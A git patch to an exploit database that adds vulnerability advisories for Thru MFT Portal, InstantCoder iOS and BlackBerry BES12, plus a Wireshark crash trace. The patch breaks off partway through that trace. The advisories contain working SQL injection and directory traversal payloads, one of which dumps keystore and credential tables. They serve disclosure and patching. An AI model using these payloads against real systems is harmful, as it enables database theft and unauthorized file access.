From f7b61997677e7c0d2689b418854935f4207d4550 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 23 Feb 2016 05:02:07 +0000 Subject: [PATCH] DB: 2016-02-23 7 new exploits --- files.csv | 7 + platforms/asp/webapps/39485.txt | 126 +++++++++++++ platforms/ios/webapps/39479.txt | 298 +++++++++++++++++++++++++++++++ platforms/java/webapps/39481.txt | 149 ++++++++++++++++ platforms/multiple/dos/39482.txt | 98 ++++++++++ platforms/multiple/dos/39483.txt | 74 ++++++++ platforms/multiple/dos/39484.txt | 141 +++++++++++++++ platforms/windows/local/39480.py | 77 ++++++++ 8 files changed, 970 insertions(+) create mode 100755 platforms/asp/webapps/39485.txt create mode 100755 platforms/ios/webapps/39479.txt create mode 100755 platforms/java/webapps/39481.txt create mode 100755 platforms/multiple/dos/39482.txt create mode 100755 platforms/multiple/dos/39483.txt create mode 100755 platforms/multiple/dos/39484.txt create mode 100755 platforms/windows/local/39480.py diff --git a/files.csv b/files.csv index 1674a21f4..49020e8fd 100755 --- a/files.csv +++ b/files.csv @@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 +39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0 37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0 @@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500 39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0 +39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0 +39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0 +39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0 +39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0 +39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0 +39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80 diff --git a/platforms/asp/webapps/39485.txt b/platforms/asp/webapps/39485.txt new file mode 100755 index 000000000..b4e51d06d --- /dev/null +++ b/platforms/asp/webapps/39485.txt @@ -0,0 +1,126 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA512 + +Advisory ID: SYSS-2015-056 +Product: Thru Managed File Transfer Portal +Manufacturer: Thru +Affected Version(s): 9.0.2 +Tested Version(s): 9.0.2 +Vulnerability Type: SQL Injection (CWE-89) +Risk Level: High +Solution Status: Open +Manufacturer Notification: 2015-10-28 +Solution Date: 2016-01-22 +Public Disclosure: 2016-02-15 +CVE Reference: Not yet assigned +Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher + (SySS GmbH) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Overview: + +Thru Managed File Transfer Portal is a web based file transfer application. +According to the Thru website [1], the application aims to offload large +file transfer to a single platform, to protect files, to replace FTP +servers and to allow access to files anytime, anywhere. + +An SQL injection vulnerability was identified in one of the GET request. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Vulnerability Details: + +The SQL injection vulnerability was found in a GET request that causes +contact data to be sorted. At least the attribute values of sortorder +and letterrange are not correctly sanitized and therefore can be abused +to inject arbitrary SQL statements. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Proof of Concept (PoC): + +The following HTTP request can be used to show that the SQL statement +causing a delay is executed and results in a 500 server error: + +GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1 +Host: [HOST] +Cookie: [COOKIES] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Solution: + +The reported security vulnerability has been fixed in a new software +release. Update to the new software version. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Disclosure Timeline: + +2015-10-27: Vulnerability discovered +2015-10-28: Vulnerability reported to manufacturer +2016-01-22: Manufacturer announced update +2016-02-15: Public release of security advisory + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +References: + +[1] Thru Homepage + http://www.thruinc.com +[2] SySS Security Advisory SYSS-2015-056 + https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt +[3] SySS Responsible Disclosure Policy + https://www.syss.de/en/news/responsible-disclosure-policy/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Credits: + +This security vulnerability was found by Dr. Erlijn van Genuchten and +Danny Österreicher of the SySS GmbH. + +E-Mail: erlijn.vangenuchten@syss.de +Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc +Key ID: 0xBD96FF2A +Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A + +E-Mail: danny.oesterreicher@syss.de +Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc +Key ID: 0x96029AC7 +Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Disclaimer: + +The information provided in this security advisory is provided "as is" +and without warranty of any kind. Details of this security advisory may +be updated in order to provide as accurate information as possible. The +latest version of this security advisory is available on the SySS Web +site. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Copyright: + +Creative Commons - Attribution (by) - Version 3.0 +URL: http://creativecommons.org/licenses/by/3.0/deed.en +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1 + +iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley +rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu +LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX +FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z +pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9 +s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp +yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2 +EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8 +Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi +b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2 +WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og +4UaL7kboaGGj3mRINLd8 +=df2e +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/ios/webapps/39479.txt b/platforms/ios/webapps/39479.txt new file mode 100755 index 000000000..228f3296d --- /dev/null +++ b/platforms/ios/webapps/39479.txt @@ -0,0 +1,298 @@ +Document Title: +=============== +InstantCoder v1.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1738 + + +Release Date: +============= +2016-02-22 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1738 + + +Common Vulnerability Scoring System: +==================================== +7 + + +Product & Service Introduction: +=============================== +You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible +for your to code and debug web apps on your lovely iPhone and iPad. + +(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application. + + +Vulnerability Disclosure Timeline: +================================== +2016-02-22: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Shumin Sun +Product: InstantCoder - iOS (Web-Application) 1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi). +The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path +commands to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own +files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local +file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to +inject the lfi payload by usage of the wifi interface or local file sync function. + +Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious +attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] ./toolkit/upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + + +1.2 +A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi). +The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device. + +The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to +manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is +POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path +variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path. + +The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account. +Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] ./listFiles + +Vulnerable Parameter(s): + [+] path + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Payload +http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!] + + +PoC: Vulnerable Source +javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]"); + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/toolkit/index.html] + Content-Length[819] + Content-Type[multipart/form-data; boundary=---------------------------29343138867419] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------29343138867419 +Content-Disposition: form-data; name="path" +-----------------------------29343138867419 +Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]" +Content-Type: image/png +- +Status: 200[OK] +GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Cache-Control[max-age=0] + Response Header: + Accept-Ranges[bytes] + Content-Length[4995] + Date[Mon, 22 Feb 2016 08:33:04 GMT] + + +Reference(s): +http://localhost:8080/toolkit/upload +http://localhost:8080/toolkit/index.html + + + +1.2 +Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Payload +http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ + + +PoC: Vulnerable Source +

+
+
+ + + +Status: 200[OK] +POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/toolkit/index.html] + Connection[keep-alive] + Content-Length[0] + Response Header: + Accept-Ranges[bytes] + Content-Length[162] + Date[Mon, 22 Feb 2016 08:09:34 GMT] +- +Status: 200[OK] +POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/toolkit/index.html] + Connection[keep-alive] + Content-Length[0] + Response Header: + Accept-Ranges[bytes] + Content-Length[2] + Date[Mon, 22 Feb 2016 08:09:37 GMT] +- +Status: 200[OK] +POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/toolkit/index.html] + Connection[keep-alive] + Content-Length[0] + Response Header: + Accept-Ranges[bytes] + Content-Length[2] + Date[Mon, 22 Feb 2016 08:09:45 GMT] + + +Reference(s): +http://localhost:8080/listFiles + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7) + +1.2 +The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/java/webapps/39481.txt b/platforms/java/webapps/39481.txt new file mode 100755 index 000000000..49d1beb19 --- /dev/null +++ b/platforms/java/webapps/39481.txt @@ -0,0 +1,149 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +BlackBerry Enterprise Service 12 (BES12) Self-Service +Affected versions: BES12 < 12.4 + +CVE: CVE-2016-1914 and CVE-2016-1915 + +PDF: +http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf + + ++-----------+ +|Description| ++-----------+ + +Blackberry BES12 is an enterprise mobile management solution and +contains a self-service web application available to mobile users. This +web application contains multiple vulnerabilities including +unauthenticated SQL +injection and reflected cross site scripting. + +Limited access to an on-premise BES12 environment was provided during +the discovery of these vulnerabilities. The full impact of the +vulnerabilities in relation to compromising other portions of the BES12 +solution, such as mobile devices, is unclear. + + ++------------+ +|Exploitation| ++------------+ + +*SQL Injection* + +The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL +injection via the imageName parameter. This servlet is exposed at +multiple paths and is used to fetch an image from the database: + +/mydevice/client/image +/admin/client/image +/myapps/client/image +/ssam/client/image +/all/client/image + + +This was discovered on a production BES12 on-premise deployment and the +injection vector allowed both UNION and stacked queries to be executed +on the Microsoft SQL server used by BES12. This allows full read/write +access to the database, and can potentially result in command execution +via xp_cmdshell depending on the database user configuration. + +The following proof of concept demonstrates an injection payload which +will select the entire obj_keystore_entry table. The query will +serialise the entire table into an XML document which is returned in the +HTTP response as UTF-16 without the leading BOM (byte order mark) +causing most text editors to fail to display the response correctly. + +https:///mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+-- + +The technique above can be used to download any database table available +to the BES12 database user. + +Notable database tables are: +* obj_user which contains BES12 user details. +* obj_user_authentication which contains authentication tokens. +* obj_user_device which based on column names, contains enrolment +tokens, enrolment secrets and device encryption keys. + +It is unclear if this information is sufficient to decrypt a lost/stolen +BES12 mobile device. + + +*Reflected Cross Site Scripting* + +Two areas of the self-service web application exist where user-supplied +input is reflected directly in web pages, allowing a malicious user to +conduct Cross Site Scripting (XSS) attacks against users of the +application. While the application uses the HttpOnly cookie flag for +session tokens, successful exploitation allows malicious JavaScript to +perform any action within the application that the targeted user is able +to. The administrative web application is typically hosted on the same +domain and may be attacked using these XSS vectors, although this is +BES12 deployment specific. + +The table below details where Cross Site Scripting was detected and +which parameters are vulnerable: + +https:///mydevice/index.jsp?locale="> +https:///mydevice/loggedOut.jsp?locale="> + + ++----------+ +| Solution | ++----------+ + + +Upgrade to BES12.4. + + ++-------------------+ +|Disclosure Timeline| ++-------------------+ + + +Initial disclosure to Blackberry – 19 Nov 2015 +Disclosure receipt confirmed by Blackberry – 19 Nov 2015 +Request for update from Blackberry – 7 Dec 2015 +Vulnerabilities confirmed by Blackberry – 8 Dec 2015 +Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016 +BES12.4 released – 29 Jan 2016 +Advisory released – 15 Feb 2016 + + ++-----------------------------+ +|About Security-Assessment.com| ++-----------------------------+ + + +Security-Assessment.com is a leading team of Information Security +consultants specialising in providing high quality Information Security +services to clients throughout the Asia Pacific region. Our clients +include some of the largest globally recognised companies in areas such +as finance, telecommunications, broadcasting, legal and government. Our +aim is to provide the very best independent advice and a high level of +technical expertise while creating long and lasting professional +relationships with our clients. +Security-Assessment.com is committed to security research and +development, and its team continues to identify and responsibly publish +vulnerabilities in public and private software vendor's products. +Members of the Security-Assessment.com R&D team are globally recognised +through their release of whitepapers and presentations related to new +security research. + +For further information on this issue or any of our service offerings, +contact us: +Web www.security-assessment.com +Email info@security-assessment.com diff --git a/platforms/multiple/dos/39482.txt b/platforms/multiple/dos/39482.txt new file mode 100755 index 000000000..070f433de --- /dev/null +++ b/platforms/multiple/dos/39482.txt @@ -0,0 +1,98 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=656 + +The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688 +READ of size 4 at 0x7f72db15e078 thread T0 + #0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 + #1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11 + #2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13 + #3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8 + #6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9 + #8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5 + #9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2 + #10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9 + #14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13 + #15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9 + #16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13 + #17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7 + #21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10 + #22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9 + #26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21 + #27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8 + #30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5 + #32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9 + #39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8 + #40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3 + #42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #43 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #45 0x515daf in main wireshark/tshark.c:2197:13 + +0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040 +SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs +Shadow bytes around the buggy address: + 0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9] + 0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 